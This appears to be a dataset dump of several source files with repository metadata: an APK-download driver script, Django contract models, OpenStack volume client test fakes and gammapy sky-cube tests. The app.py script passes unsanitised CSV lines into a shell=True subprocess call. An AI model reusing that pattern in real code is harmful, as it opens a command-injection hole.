923310233/APk-Down-Load
|
e7c3e4fdfbf9f7d8398d91ce0c5c028dfc685f3a
|
[
"MIT"
] | 2
|
2021-07-28T07:06:55.000Z
|
2021-07-28T07:08:19.000Z
|
app.py
|
923310233/APk-Down-Load
|
e7c3e4fdfbf9f7d8398d91ce0c5c028dfc685f3a
|
[
"MIT"
] | null | null | null |
app.py
|
923310233/APk-Down-Load
|
e7c3e4fdfbf9f7d8398d91ce0c5c028dfc685f3a
|
[
"MIT"
] | null | null | null |
import subprocess
f = open("app_list.csv","r")
lines = f.readlines()
for line in lines:
print(line.strip())
command = "node app.js " + line.strip();
display = subprocess.run(command, stdout=subprocess.PIPE, shell=True)
# display = subprocess.run(["sudo","-u",username,"tshark", "-r", pcapname, "-Y", display_filter[sp]], stdout=subprocess.PIPE)
# display_in_list = display.stdout.split()
| 31.076923
| 126
| 0.680693
| 55
| 404
| 4.927273
| 0.6
| 0.066421
| 0.147601
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.133663
| 404
| 13
| 127
| 31.076923
| 0.774286
| 0.408416
| 0
| 0
| 0
| 0
| 0.105485
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0.142857
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
903ed7280655c7a88f5f5eb4e9a427e26a17d12e
| 4,035
|
py
|
Python
|
contracts/models.py
|
sivanagarajumolabanti/IPFS
|
9ae01ce09c97660ca312aad7d612bbc8eb8146e7
|
[
"MIT"
] | 1
|
2019-08-27T04:20:06.000Z
|
2019-08-27T04:20:06.000Z
|
contracts/models.py
|
sivanagarajumolabanti/IPFS
|
9ae01ce09c97660ca312aad7d612bbc8eb8146e7
|
[
"MIT"
] | null | null | null |
contracts/models.py
|
sivanagarajumolabanti/IPFS
|
9ae01ce09c97660ca312aad7d612bbc8eb8146e7
|
[
"MIT"
] | null | null | null |
from django.contrib.auth.models import User
from django.db import models
from django.utils.timezone import now
class Vendor(models.Model):
user = models.ManyToManyField(User)
name = models.CharField(max_length=30, null=True)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
def __str__(self):
return self.name
class File(models.Model):
file = models.FileField(upload_to='documents/')
def __str__(self):
return self.file.name
class Contract(models.Model):
approved = 1
pending = 0
vendor = 2
STATUS_CHOICES = (
(approved, 'Approved'),
(vendor, 'Vendors Approved'),
(pending, 'Pending'),
)
smart_choices = ((1, 'Yes'), (0, 'No'))
name = models.CharField(max_length=255)
user = models.ForeignKey(User, on_delete=models.CASCADE, null=True)
vendor = models.ForeignKey(Vendor, on_delete=models.CASCADE, null=True)
amount = models.DecimalField(null=True, max_digits=10, decimal_places=2)
installments = models.IntegerField(null=True)
amount_paid = models.DecimalField(null=True, max_digits=10, decimal_places=2)
status = models.CharField(max_length=2,
choices=STATUS_CHOICES, default=0, null=True, blank=True)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
validity = models.DateField(default=now)  # pass the callable so the default is evaluated at save time
comments = models.TextField(null=True, blank=True)
smart_contract = models.BooleanField(max_length=2, choices=smart_choices, default=0)
files = models.ManyToManyField(File, related_name='files')
hash_key = models.CharField(max_length=255, blank=True)
def __str__(self):
return self.name
class Approvals(models.Model):
LEVEL_CHOICES = (
('0', 'Contract'),
('1', 'Sow'),
('2', 'Invoice'),
)
Approvals = ((1, 'Yes'), (0, 'No'))
contracts = models.ForeignKey(Contract, on_delete=models.CASCADE, null=True)
user = models.ForeignKey(User, on_delete=models.CASCADE, null=True)
status = models.BooleanField(max_length=2, choices=Approvals, default=0)
comments = models.TextField(null=True, blank=True)
contract_level = models.CharField(max_length=2,
choices=LEVEL_CHOICES, default=0, null=True, blank=True)
def __str__(self):
return self.contracts.name
class DocuSign(models.Model):
contract = models.ForeignKey(Contract, on_delete=models.CASCADE, null=True)
user = models.ForeignKey(User, on_delete=models.CASCADE, null=True)
envelope = models.CharField(max_length=255, null=True, blank=True)
document_name = models.CharField(max_length=255, null=True, blank=True)
files = models.FileField(upload_to='media/', null=True, blank=True)
def __str__(self):
return self.contract.name
class IPFSModel(models.Model):
name = models.CharField(max_length=255)
hashkey = models.CharField(max_length=255)
size = models.CharField(max_length=255)
def __unicode__(self):
return self.name
class Sow(models.Model):
contract = models.ForeignKey(Contract, on_delete=models.CASCADE,null=True)
smart_choices = ((1, 'Yes'), (0, 'No'))
smart_contract = models.BooleanField(max_length=2, choices=smart_choices, default=0)
file = models.FileField(upload_to='documents/')
def __str__(self):
return self.contract.name
class Invoice(models.Model):
amount = models.DecimalField(null=True, max_digits=10, decimal_places=2)
contract = models.ForeignKey(Contract, on_delete=models.CASCADE,null=True)
file = models.FileField(upload_to='documents/')
user = models.ForeignKey(User, on_delete=models.CASCADE, null=True)
smart_choices = (('1', 'Declined'), ('0', 'Approved'), ('2', 'Created'))
status = models.CharField(max_length=2, choices=smart_choices, default='2', null=True, blank=True)
def __str__(self):
return self.contract.name
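# A minimal sketch of Django's callable-default pattern used by `validity`
# above (hypothetical model, for illustration only): passing `now` defers
# evaluation to each save, whereas `now()` would freeze the import-time value.
from django.db import models
from django.utils.timezone import now

class ExampleDocument(models.Model):
    issued_on = models.DateField(default=now)            # evaluated per row
    created_at = models.DateTimeField(auto_now_add=True)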
| 36.351351
| 102
| 0.691698
| 510
| 4,035
| 5.292157
| 0.172549
| 0.065209
| 0.073361
| 0.097814
| 0.727677
| 0.67877
| 0.596147
| 0.513524
| 0.482401
| 0.426454
| 0
| 0.017841
| 0.180421
| 4,035
| 110
| 103
| 36.681818
| 0.798307
| 0
| 0
| 0.430233
| 0
| 0
| 0.033457
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.093023
| false
| 0
| 0.034884
| 0.093023
| 0.883721
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9040b2be08c9dcba639583373b5f0c4c01de3091
| 13,242
|
py
|
Python
|
openstackclient/tests/unit/volume/v3/fakes.py
|
mydevice/python-openstackclient
|
4891bb38208fdcd1a2ae60e47b056841e14fbdf7
|
[
"Apache-2.0"
] | 262
|
2015-01-29T20:10:49.000Z
|
2022-03-23T01:59:23.000Z
|
openstackclient/tests/unit/volume/v3/fakes.py
|
mydevice/python-openstackclient
|
4891bb38208fdcd1a2ae60e47b056841e14fbdf7
|
[
"Apache-2.0"
] | 5
|
2015-01-21T02:37:35.000Z
|
2021-11-23T02:26:00.000Z
|
openstackclient/tests/unit/volume/v3/fakes.py
|
mydevice/python-openstackclient
|
4891bb38208fdcd1a2ae60e47b056841e14fbdf7
|
[
"Apache-2.0"
] | 194
|
2015-01-08T07:39:27.000Z
|
2022-03-30T13:51:23.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
from unittest import mock
import uuid
from cinderclient import api_versions
from openstackclient.tests.unit.compute.v2 import fakes as compute_fakes
from openstackclient.tests.unit import fakes
from openstackclient.tests.unit.identity.v3 import fakes as identity_fakes
from openstackclient.tests.unit import utils
from openstackclient.tests.unit.volume.v2 import fakes as volume_v2_fakes
class FakeVolumeClient(object):
def __init__(self, **kwargs):
self.auth_token = kwargs['token']
self.management_url = kwargs['endpoint']
self.api_version = api_versions.APIVersion('3.0')
self.attachments = mock.Mock()
self.attachments.resource_class = fakes.FakeResource(None, {})
self.groups = mock.Mock()
self.groups.resource_class = fakes.FakeResource(None, {})
self.group_snapshots = mock.Mock()
self.group_snapshots.resource_class = fakes.FakeResource(None, {})
self.group_types = mock.Mock()
self.group_types.resource_class = fakes.FakeResource(None, {})
self.messages = mock.Mock()
self.messages.resource_class = fakes.FakeResource(None, {})
self.volumes = mock.Mock()
self.volumes.resource_class = fakes.FakeResource(None, {})
self.volume_types = mock.Mock()
self.volume_types.resource_class = fakes.FakeResource(None, {})
class TestVolume(utils.TestCommand):
def setUp(self):
super().setUp()
self.app.client_manager.volume = FakeVolumeClient(
endpoint=fakes.AUTH_URL,
token=fakes.AUTH_TOKEN
)
self.app.client_manager.identity = identity_fakes.FakeIdentityv3Client(
endpoint=fakes.AUTH_URL,
token=fakes.AUTH_TOKEN
)
self.app.client_manager.compute = compute_fakes.FakeComputev2Client(
endpoint=fakes.AUTH_URL,
token=fakes.AUTH_TOKEN,
)
# TODO(stephenfin): Check if the responses are actually the same
FakeVolume = volume_v2_fakes.FakeVolume
FakeVolumeType = volume_v2_fakes.FakeVolumeType
class FakeVolumeGroup:
"""Fake one or more volume groups."""
@staticmethod
def create_one_volume_group(attrs=None):
"""Create a fake group.
:param attrs: A dictionary with all attributes of group
:return: A FakeResource object with id, name, status, etc.
"""
attrs = attrs or {}
group_type = attrs.pop('group_type', None) or uuid.uuid4().hex
volume_types = attrs.pop('volume_types', None) or [uuid.uuid4().hex]
# Set default attribute
group_info = {
'id': uuid.uuid4().hex,
'status': random.choice([
'available',
]),
'availability_zone': f'az-{uuid.uuid4().hex}',
'created_at': '2015-09-16T09:28:52.000000',
'name': 'first_group',
'description': f'description-{uuid.uuid4().hex}',
'group_type': group_type,
'volume_types': volume_types,
'volumes': [f'volume-{uuid.uuid4().hex}'],
'group_snapshot_id': None,
'source_group_id': None,
'project_id': f'project-{uuid.uuid4().hex}',
}
# Overwrite default attributes if there are some attributes set
group_info.update(attrs)
group = fakes.FakeResource(
None,
group_info,
loaded=True)
return group
@staticmethod
def create_volume_groups(attrs=None, count=2):
"""Create multiple fake groups.
:param attrs: A dictionary with all attributes of group
:param count: The number of groups to be faked
:return: A list of FakeResource objects
"""
groups = []
for n in range(0, count):
groups.append(FakeVolumeGroup.create_one_volume_group(attrs))
return groups
class FakeVolumeGroupSnapshot:
"""Fake one or more volume group snapshots."""
@staticmethod
def create_one_volume_group_snapshot(attrs=None, methods=None):
"""Create a fake group snapshot.
:param attrs: A dictionary with all attributes
:param methods: A dictionary with all methods
:return: A FakeResource object with id, name, description, etc.
"""
attrs = attrs or {}
# Set default attribute
group_snapshot_info = {
'id': uuid.uuid4().hex,
'name': f'group-snapshot-{uuid.uuid4().hex}',
'description': f'description-{uuid.uuid4().hex}',
'status': random.choice(['available']),
'group_id': uuid.uuid4().hex,
'group_type_id': uuid.uuid4().hex,
'project_id': uuid.uuid4().hex,
}
# Overwrite default attributes if there are some attributes set
group_snapshot_info.update(attrs)
group_snapshot = fakes.FakeResource(
None,
group_snapshot_info,
methods=methods,
loaded=True)
return group_snapshot
@staticmethod
def create_volume_group_snapshots(attrs=None, count=2):
"""Create multiple fake group snapshots.
:param attrs: A dictionary with all attributes of group snapshot
:param count: The number of group snapshots to be faked
:return: A list of FakeResource objects
"""
group_snapshots = []
for n in range(0, count):
group_snapshots.append(
FakeVolumeGroupSnapshot.create_one_volume_group_snapshot(attrs)
)
return group_snapshots
class FakeVolumeGroupType:
"""Fake one or more volume group types."""
@staticmethod
def create_one_volume_group_type(attrs=None, methods=None):
"""Create a fake group type.
:param attrs: A dictionary with all attributes of group type
:param methods: A dictionary with all methods
:return: A FakeResource object with id, name, description, etc.
"""
attrs = attrs or {}
# Set default attribute
group_type_info = {
'id': uuid.uuid4().hex,
'name': f'group-type-{uuid.uuid4().hex}',
'description': f'description-{uuid.uuid4().hex}',
'is_public': random.choice([True, False]),
'group_specs': {},
}
# Overwrite default attributes if there are some attributes set
group_type_info.update(attrs)
group_type = fakes.FakeResource(
None,
group_type_info,
methods=methods,
loaded=True)
return group_type
@staticmethod
def create_volume_group_types(attrs=None, count=2):
"""Create multiple fake group types.
:param attrs: A dictionary with all attributes of group type
:param count: The number of group types to be faked
:return: A list of FakeResource objects
"""
group_types = []
for n in range(0, count):
group_types.append(
FakeVolumeGroupType.create_one_volume_group_type(attrs)
)
return group_types
class FakeVolumeMessage:
"""Fake one or more volume messages."""
@staticmethod
def create_one_volume_message(attrs=None):
"""Create a fake message.
:param attrs: A dictionary with all attributes of message
:return: A FakeResource object with id, name, status, etc.
"""
attrs = attrs or {}
# Set default attribute
message_info = {
'created_at': '2016-02-11T11:17:37.000000',
'event_id': f'VOLUME_{random.randint(1, 999999):06d}',
'guaranteed_until': '2016-02-11T11:17:37.000000',
'id': uuid.uuid4().hex,
'message_level': 'ERROR',
'request_id': f'req-{uuid.uuid4().hex}',
'resource_type': 'VOLUME',
'resource_uuid': uuid.uuid4().hex,
'user_message': f'message-{uuid.uuid4().hex}',
}
# Overwrite default attributes if there are some attributes set
message_info.update(attrs)
message = fakes.FakeResource(
None,
message_info,
loaded=True)
return message
@staticmethod
def create_volume_messages(attrs=None, count=2):
"""Create multiple fake messages.
:param attrs: A dictionary with all attributes of message
:param count: The number of messages to be faked
:return: A list of FakeResource objects
"""
messages = []
for n in range(0, count):
messages.append(FakeVolumeMessage.create_one_volume_message(attrs))
return messages
@staticmethod
def get_volume_messages(messages=None, count=2):
"""Get an iterable MagicMock object with a list of faked messages.
If messages list is provided, then initialize the Mock object with the
list. Otherwise create one.
:param messages: A list of FakeResource objects faking messages
:param count: The number of messages to be faked
:return An iterable Mock object with side_effect set to a list of faked
messages
"""
if messages is None:
messages = FakeVolumeMessage.create_volume_messages(count)
return mock.Mock(side_effect=messages)
class FakeVolumeAttachment:
"""Fake one or more volume attachments."""
@staticmethod
def create_one_volume_attachment(attrs=None):
"""Create a fake volume attachment.
:param attrs: A dictionary with all attributes of volume attachment
:return: A FakeResource object with id, status, etc.
"""
attrs = attrs or {}
attachment_id = uuid.uuid4().hex
volume_id = attrs.pop('volume_id', None) or uuid.uuid4().hex
server_id = attrs.pop('instance', None) or uuid.uuid4().hex
# Set default attribute
attachment_info = {
'id': attachment_id,
'volume_id': volume_id,
'instance': server_id,
'status': random.choice([
'attached',
'attaching',
'detached',
'reserved',
'error_attaching',
'error_detaching',
'deleted',
]),
'attach_mode': random.choice(['ro', 'rw']),
'attached_at': '2015-09-16T09:28:52.000000',
'detached_at': None,
'connection_info': {
'access_mode': 'rw',
'attachment_id': attachment_id,
'auth_method': 'CHAP',
'auth_password': 'AcUZ8PpxLHwzypMC',
'auth_username': '7j3EZQWT3rbE6pcSGKvK',
'cacheable': False,
'driver_volume_type': 'iscsi',
'encrypted': False,
'qos_specs': None,
'target_discovered': False,
'target_iqn':
f'iqn.2010-10.org.openstack:volume-{attachment_id}',
'target_lun': '1',
'target_portal': '192.168.122.170:3260',
'volume_id': volume_id,
},
}
# Overwrite default attributes if there are some attributes set
attachment_info.update(attrs)
attachment = fakes.FakeResource(
None,
attachment_info,
loaded=True)
return attachment
@staticmethod
def create_volume_attachments(attrs=None, count=2):
"""Create multiple fake volume attachments.
:param attrs: A dictionary with all attributes of volume attachment
:param count: The number of volume attachments to be faked
:return: A list of FakeResource objects
"""
attachments = []
for n in range(0, count):
attachments.append(
FakeVolumeAttachment.create_one_volume_attachment(attrs))
return attachments
@staticmethod
def get_volume_attachments(attachments=None, count=2):
"""Get an iterable MagicMock object with a list of faked volumes.
If attachments list is provided, then initialize the Mock object with
the list. Otherwise create one.
:param attachments: A list of FakeResource objects faking volume
attachments
:param count: The number of volume attachments to be faked
:return An iterable Mock object with side_effect set to a list of faked
volume attachments
"""
if attachments is None:
attachments = FakeVolumeAttachment.create_volume_attachments(count)
return mock.Mock(side_effect=attachments)
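# Minimal usage sketch (hypothetical test case, not part of this module):
# the factories return FakeResource objects whose attributes mirror the
# info dicts above, so tests can stub volume client calls with them.
class TestVolumeGroupList(TestVolume):
    def setUp(self):
        super().setUp()
        self.fake_groups = FakeVolumeGroup.create_volume_groups(count=3)
        self.app.client_manager.volume.groups.list.return_value = self.fake_groups

    def test_fake_groups_have_ids(self):
        for group in self.fake_groups:
            self.assertTrue(group.id)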
| 33.953846
| 79
| 0.614258
| 1,493
| 13,242
| 5.320831
| 0.170127
| 0.026057
| 0.034743
| 0.02719
| 0.530841
| 0.468907
| 0.364552
| 0.300101
| 0.260196
| 0.201158
| 0
| 0.017726
| 0.292781
| 13,242
| 389
| 80
| 34.041131
| 0.830539
| 0.280849
| 0
| 0.232143
| 0
| 0
| 0.138629
| 0.049956
| 0
| 0
| 0
| 0.002571
| 0
| 1
| 0.0625
| false
| 0.004464
| 0.040179
| 0
| 0.1875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9040cb412be761146b6669d9fd4eade5a3ac0512
| 12,287
|
py
|
Python
|
gammapy/cube/tests/test_core.py
|
grburgess/gammapy
|
609e460698caca7223afeef5e71826c7b32728d1
|
[
"BSD-3-Clause"
] | 3
|
2019-01-28T12:21:14.000Z
|
2019-02-10T19:58:07.000Z
|
gammapy/cube/tests/test_core.py
|
grburgess/gammapy
|
609e460698caca7223afeef5e71826c7b32728d1
|
[
"BSD-3-Clause"
] | null | null | null |
gammapy/cube/tests/test_core.py
|
grburgess/gammapy
|
609e460698caca7223afeef5e71826c7b32728d1
|
[
"BSD-3-Clause"
] | null | null | null |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from __future__ import absolute_import, division, print_function, unicode_literals
import numpy as np
from numpy.testing import assert_allclose
from astropy.coordinates import Angle
from astropy.tests.helper import pytest, assert_quantity_allclose
from astropy.units import Quantity
from astropy.wcs import WCS
from ...utils.testing import requires_dependency, requires_data
from ...datasets import FermiGalacticCenter
from ...image import make_header
from ...irf import EnergyDependentTablePSF
from ...spectrum.powerlaw import power_law_evaluate
from .. import SkyCube, compute_npred_cube, convolve_cube
@requires_data('gammapy-extra')
@requires_dependency('scipy')
class TestSkyCube(object):
def setup(self):
self.sky_cube = FermiGalacticCenter.diffuse_model()
assert self.sky_cube.data.shape == (30, 21, 61)
def test_init(self):
name = 'Axel'
data = self.sky_cube.data
wcs = self.sky_cube.wcs
energy = self.sky_cube.energy
sky_cube = SkyCube(name, data, wcs, energy)
assert sky_cube.data.shape == (30, 21, 61)
def test_read_write(self, tmpdir):
filename = str(tmpdir / 'sky_cube.fits')
self.sky_cube.writeto(filename)
sky_cube = SkyCube.read(filename)
assert sky_cube.data.shape == (30, 21, 61)
def test_pix2world(self):
# Corner pixel with index [0, 0, 0]
lon, lat, energy = self.sky_cube.pix2world(0, 0, 0)
assert_quantity_allclose(lon, Quantity(344.75, 'deg'))
assert_quantity_allclose(lat, Quantity(-5.25, 'deg'))
assert_quantity_allclose(energy, Quantity(50, 'MeV'))
def test_world2pix(self):
lon = Quantity(344.75, 'deg')
lat = Quantity(-5.25, 'deg')
energy = Quantity(50, 'MeV')
x, y, z = self.sky_cube.world2pix(lon, lat, energy)
assert_allclose((x, y, z), (0, 0, 0))
def test_pix2world2pix(self):
# Test round-tripping
pix = 2.2, 3.3, 4.4
world = self.sky_cube.pix2world(*pix)
pix2 = self.sky_cube.world2pix(*world)
assert_allclose(pix2, pix)
# Check array inputs
pix = [2.2, 2.2], [3.3, 3.3], [4.4, 4.4]
world = self.sky_cube.pix2world(*pix)
pix2 = self.sky_cube.world2pix(*world)
assert_allclose(pix2, pix)
@pytest.mark.xfail
def test_flux_scalar(self):
# Corner pixel with index [0, 0, 0]
lon = Quantity(344.75, 'deg') # pixel 0
lat = Quantity(-5.25, 'deg') # pixel 0
energy = Quantity(50, 'MeV') # slice 0
actual = self.sky_cube.flux(lon, lat, energy)
expected = self.sky_cube.data[0, 0, 0]
assert_quantity_allclose(actual, expected)
# Galactic center position
lon = Quantity(0, 'deg') # between pixel 11 and 12 in ds9 viewer
lat = Quantity(0, 'deg') # between pixel 30 and 31 in ds9 viewer
energy = Quantity(528.9657943133443, 'MeV') # slice 10 in ds9 viewer
actual = self.sky_cube.flux(lon, lat, energy)
# Compute expected value by interpolating 4 neighbors
# Use data axis order: energy, lat, lon
# and remember that numpy starts counting at 0 whereas FITS start at 1
s = self.sky_cube.data
expected = s[9, 10:12, 29:31].mean()
# TODO: why are these currently inconsistent by a few % !?
# actual = 9.67254380e-07
# expected = 10.13733026e-07
assert_quantity_allclose(actual, expected)
def test_flux_mixed(self):
# Corner pixel with index [0, 0, 0]
lon = Quantity([344.75, 344.75], 'deg') # pixel 0 twice
lat = Quantity([-5.25, -5.25], 'deg') # pixel 0 twice
energy = Quantity(50, 'MeV') # slice 0
actual = self.sky_cube.flux(lon, lat, energy)
expected = self.sky_cube.data[0, 0, 0]
assert_quantity_allclose(actual, expected)
def test_flux_array(self):
pix = [2, 2], [3, 3], [4, 4]
world = self.sky_cube.pix2world(*pix)
actual = self.sky_cube.flux(*world)
expected = self.sky_cube.data[4, 3, 2]
# Quantity([3.50571123e-07, 2], '1 / (cm2 MeV s sr)')
assert_quantity_allclose(actual, expected)
def test_integral_flux_image(self):
# For a very small energy band the integral flux should be roughly
# differential flux times energy bin width
lon, lat, energy = self.sky_cube.pix2world(0, 0, 0)
denergy = 0.001 * energy
energy_band = Quantity([energy, energy + denergy])
dflux = self.sky_cube.flux(lon, lat, energy)
expected = dflux * denergy
actual = Quantity(self.sky_cube.integral_flux_image(energy_band).data[0, 0],
'1 / (cm2 s sr)')
assert_quantity_allclose(actual, expected, rtol=1e-3)
# Test a wide energy band
energy_band = Quantity([1, 10], 'GeV')
image = self.sky_cube.integral_flux_image(energy_band)
actual = image.data.sum()
# TODO: the reference result is not verified ... just pasted from the test output.
expected = 5.2481972772213124e-02
assert_allclose(actual, expected)
# Test integral flux for energy bands with units.
energy_band_check = Quantity([1000, 10000], 'MeV')
new_image = self.sky_cube.integral_flux_image(energy_band_check)
assert_allclose(new_image.data, image.data)
assert new_image.wcs.axis_type_names == ['GLON', 'GLAT']
# TODO: fix this test.
# It's currently failing. Don't know which number (if any) is correct.
# E x: array(7.615363001210512e-05)
# E y: array(0.00015230870989335428)
@pytest.mark.xfail
def test_solid_angle(self):
actual = self.sky_cube.solid_angle[10][30]
expected = Quantity(self.sky_cube.wcs.wcs.cdelt[:-1].prod(), 'deg2')
assert_quantity_allclose(actual, expected, rtol=1e-4)
def test_coordinates(self):
coordinates = self.sky_cube.coordinates()
lon = coordinates.data.lon
lat = coordinates.data.lat
assert lon.shape == (21, 61)
assert lat.shape == (21, 61)
assert_allclose(lon[0, 0], Angle("344d45m00s"))
assert_allclose(lat[0, 0], Angle(" -5d15m00s"))
assert_allclose(lon[0, -1], Angle("14d45m00s"))
assert_allclose(lat[0, -1], Angle("-5d15m00s"))
assert_allclose(lon[-1, 0], Angle("344d45m00s"))
assert_allclose(lat[-1, 0], Angle("4d45m00s"))
assert_allclose(lon[-1, -1], Angle("14d45m00s"))
assert_allclose(lat[-1, -1], Angle("4d45m00s"))
@pytest.mark.xfail
@requires_dependency('scipy.interpolate.RegularGridInterpolator')
@requires_dependency('reproject')
def test_compute_npred_cube():
# A quickly implemented check - should be improved
filenames = FermiGalacticCenter.filenames()
sky_cube = SkyCube.read(filenames['diffuse_model'])
exposure_cube = SkyCube.read(filenames['exposure_cube'])
counts_cube = FermiGalacticCenter.counts()
energy_bounds = Quantity([10, 30, 100, 500], 'GeV')
sky_cube = sky_cube.reproject_to(exposure_cube)
npred_cube = compute_npred_cube(sky_cube,
exposure_cube,
energy_bounds)
expected_sum = counts_cube.data.sum()
actual_sum = np.nan_to_num(npred_cube.data).sum()
# Check npred is the same order of magnitude as the true counts
assert_allclose(expected_sum, actual_sum, rtol=1)
# PSF convolve the npred cube
psf = EnergyDependentTablePSF.read(FermiGalacticCenter.filenames()['psf'])
npred_cube_convolved = convolve_cube(npred_cube, psf, offset_max=Angle(3, 'deg'))
actual_convolved_sum = npred_cube_convolved.data.sum()
# Check sum is the same after convolution
assert_allclose(actual_sum, actual_convolved_sum, rtol=0.1)
# Test shape
expected = ((len(energy_bounds) - 1, exposure_cube.data.shape[1],
exposure_cube.data.shape[2]))
actual = npred_cube_convolved.data.shape
assert_allclose(actual, expected)
def make_test_cubes(energies, nxpix, nypix, binsz):
"""Makes exposure and spectral cube for tests.
Parameters
----------
energies : `~astropy.units.Quantity`
Quantity 1D array of energies of cube layers
nxpix : int
Number of pixels in x-spatial direction
nypix : int
Number of pixels in y-spatial direction
binsz : float
Spatial resolution of cube, in degrees per pixel
Returns
-------
exposure_cube : `~gammapy.sky_cube.SkyCube`
Cube of uniform exposure = 1 cm^2 s
sky_cube : `~gammapy.sky_cube.SkyCube`
Cube of differential fluxes in units of cm^-2 s^-1 GeV^-1 sr^-1
"""
header = make_header(nxpix, nypix, binsz)
header['NAXIS'] = 3
header['NAXIS3'] = len(energies)
header['CDELT3'] = 1
header['CRVAL3'] = 1
header['CRPIX3'] = 1
wcs = WCS(header)
data_array = np.ones((len(energies), 10, 10))
exposure_cube = SkyCube(data=Quantity(data_array, 'cm2 s'),
wcs=wcs, energy=energies)
flux = power_law_evaluate(energies.value, 1, 2, 1)
flux = Quantity(flux, '1/(cm2 s GeV sr)')
flux_array = np.zeros_like(data_array)
for i in np.arange(len(flux)):
flux_array[i] = flux.value[i] * data_array[i]
sky_cube = SkyCube(data=Quantity(flux_array, flux.unit),
wcs=wcs, energy=energies)
return exposure_cube, sky_cube
@requires_dependency('scipy.interpolate.RegularGridInterpolator')
@requires_dependency('reproject')
def test_analytical_npred_cube():
# Analytical check: g=2, N=1 gives int. flux 0.25 between 1 and 2
# (arbitrary units of energy).
# Exposure = 1, so solid angle only factor which varies.
# Result should be 0.5 * 1 * solid_angle_array from integrating analytically
energies = Quantity([1, 2], 'MeV')
exposure_cube, sky_cube = make_test_cubes(energies, 10, 10, 1)
solid_angle_array = exposure_cube.solid_angle
# Expected npred counts (so no quantity)
expected = 0.5 * solid_angle_array.value
# Integral resolution is 1 as this is a true powerlaw case
npred_cube = compute_npred_cube(sky_cube, exposure_cube,
energies, integral_resolution=1)
actual = npred_cube.data[0]
assert_allclose(actual, expected)
@requires_dependency('scipy.interpolate.RegularGridInterpolator')
@requires_dependency('reproject')
def test_convolve_cube():
filenames = FermiGalacticCenter.filenames()
sky_cube = SkyCube.read(filenames['diffuse_model'])
exposure_cube = SkyCube.read(filenames['exposure_cube'])
energy_bounds = Quantity([10, 30, 100, 500], 'GeV')
sky_cube = sky_cube.reproject_to(exposure_cube)
npred_cube = compute_npred_cube(sky_cube,
exposure_cube,
energy_bounds)
# PSF convolve the npred cube
psf = EnergyDependentTablePSF.read(FermiGalacticCenter.filenames()['psf'])
npred_cube_convolved = convolve_cube(npred_cube, psf, offset_max=Angle(5, 'deg'))
expected = npred_cube.data.sum()
actual = npred_cube_convolved.data.sum()
assert_allclose(actual, expected, rtol=1e-2)
@pytest.mark.xfail
@requires_dependency('scipy')
@requires_dependency('reproject')
def test_reproject_cube():
# TODO: a better test can probably be implemented here to avoid
# repeating code
filenames = FermiGalacticCenter.filenames()
sky_cube = SkyCube.read(filenames['diffuse_model'])
exposure_cube = SkyCube.read(filenames['exposure_cube'])
original_cube = Quantity(np.nan_to_num(sky_cube.data.value),
sky_cube.data.unit)
sky_cube = sky_cube.reproject_to(exposure_cube)
reprojected_cube = Quantity(np.nan_to_num(sky_cube.data.value),
sky_cube.data.unit)
# 0.5 degrees per pixel in diffuse model
# 2 degrees in reprojection reference
# sum of reprojected should be 1/16 of sum of original if flux-preserving
expected = 0.0625 * original_cube.sum()
actual = reprojected_cube.sum()
assert_quantity_allclose(actual, expected, rtol=1e-2)
| 39.763754
| 90
| 0.657524
| 1,631
| 12,287
| 4.786021
| 0.195586
| 0.050218
| 0.040866
| 0.025109
| 0.425826
| 0.358698
| 0.328593
| 0.298232
| 0.272483
| 0.248655
| 0
| 0.049698
| 0.231952
| 12,287
| 308
| 91
| 39.892857
| 0.777472
| 0.198258
| 0
| 0.343284
| 0
| 0
| 0.051192
| 0.012644
| 0
| 0
| 0
| 0.006494
| 0.179104
| 1
| 0.084577
| false
| 0
| 0.064677
| 0
| 0.159204
| 0.004975
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
90459d8bfe26d007178d66a09649931906768496
| 5,829
|
py
|
Python
|
web_app/ca_modules/make_utils.py
|
Lockers13/codagio
|
cfe9325cb3c207f7728db3c287439ce761ffea14
|
[
"MIT"
] | 2
|
2021-01-16T13:42:14.000Z
|
2021-03-03T19:36:47.000Z
|
web_app/ca_modules/make_utils.py
|
Lockers13/codagio
|
cfe9325cb3c207f7728db3c287439ce761ffea14
|
[
"MIT"
] | null | null | null |
web_app/ca_modules/make_utils.py
|
Lockers13/codagio
|
cfe9325cb3c207f7728db3c287439ce761ffea14
|
[
"MIT"
] | null | null | null |
### Utilities used throughout the problem submission and analysis pipeline ###
